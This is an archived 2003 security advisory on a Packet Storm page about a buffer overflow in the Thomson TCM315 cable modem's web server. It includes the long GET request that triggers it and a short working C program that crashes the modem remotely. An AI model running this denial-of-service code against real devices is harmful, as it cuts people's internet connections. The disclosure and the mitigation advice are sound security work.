exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TCM315.txt

TCM315.txt
Posted Nov 25, 2003
Authored by Andres Tarasco

The embedded webserver for the Thomson TCM315 cable modem is vulnerable to a buffer overflow during a typical GET method HTTP request.

tags | exploit, web, overflow
SHA-256 | 9fe3659ee27d616cce7a519a8bdc569a333a69876d8490c3875cba0299d02fe9

TCM315.txt

Change Mirror Download
___________________________________________________________________________

. : Shell Security Advisory : .

Subject: Buffer overflow in the cable modem Thomson TCM315

Issue date: 2003 November 23

Related link: http://www.shellsec.net/leer_advisory.php?id=2

Homepage: http://www.shellsec.net

Info about product: http://www.qb.ro/docs/tcm315.pdf

___________________________________________________________________________


[ - 1 - Introduction ]
----------------------------

Software description:

Thomson TCM315 cable modem

- DOCSIS 1.0 certified

- DOCSIS 2.0 ready and DOCSIS 1.1 compliant

- NAT/PAT/Firewall and integrated router for SOHO installations (in a
separate software release)

- Bridging between the USB and Ethernet port

- Easy Access to Advanced Diagnostics Web Pages

- USB port for easy installation

- Reliable high-performance platform

- Surf the Internet Up to 100 Times Faster than a 56k analog Modem

- Internet On-Off button for enhanced security


[ - 2 - Problem description ]
----------------------------------------

The problem appears by sending an HTTP request with a long string to the
cable modem, causing a deny of service (DoS). Example:

GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

or

http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


[ - 3 - How to exploit it ]
----------------------------------

To test this vulnerability, we used the next code. Note: the code is
written in C to be used in Windows systems, but it's easily portable to
Unix systems.

--------------------- CUT HERE ---------------------

/*
ADVISORY - Thomson Cablemodem TCM315 Denial of Service

Shell security group (2003) http://www.shellsec.net

November 10 of 2003

Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown internet
connection.

Discovered by: aT4r Andres[at]shellsec.net
Vendor: contacted (no answer)
Fix: no yet

usage: just, thdos.exe 192.168.100.1

*/

#include <stdio.h>
#include <winsock2.h>

void main(int argc,char *argv[]) {
char evil[150],buffer[1000];
struct sockaddr_in shellsec;
int fd;
WSADATA ws;

WSAStartup( MAKEWORD(1,1), &( ws) );

shellsec.sin_family = AF_INET;
shellsec.sin_port = htons(80);
shellsec.sin_addr.s_addr = inet_addr(argv[1]);

memset(evil,'\0',sizeof(evil));
memset(evil,'A',100);
sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {
send(fd,buffer,strlen(buffer),0);
printf("done. Thomson Cablemodem reset!\n");
sleep(100);
}
else printf("Unable to connect to CM.\n");
}

--------------------- CUT HERE ---------------------


[ - 4 - Solution ]
-----------------------

Thomson was advised about this vulnerability, but we got no answer, so as
we know there is no patch to fix this issue.. As a possible solution, you
can filter requests made to the cable modem.


[ - 5 - Credits ]
---------------------

Autor: Andrés Tarascó ( andres[at]shellsec.net )
Redactor: Fernando Ortega ( fernando[at]shellsec.net )
Issue date: 23 de Noviembre de 2003
Url: http://www.shellsec.net


_______________________________________________________

Administrador de Shell Security (admin[at]shellsec.net)
Shell Security Group (http://www.shellsec.net)
_______________________________________________________
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close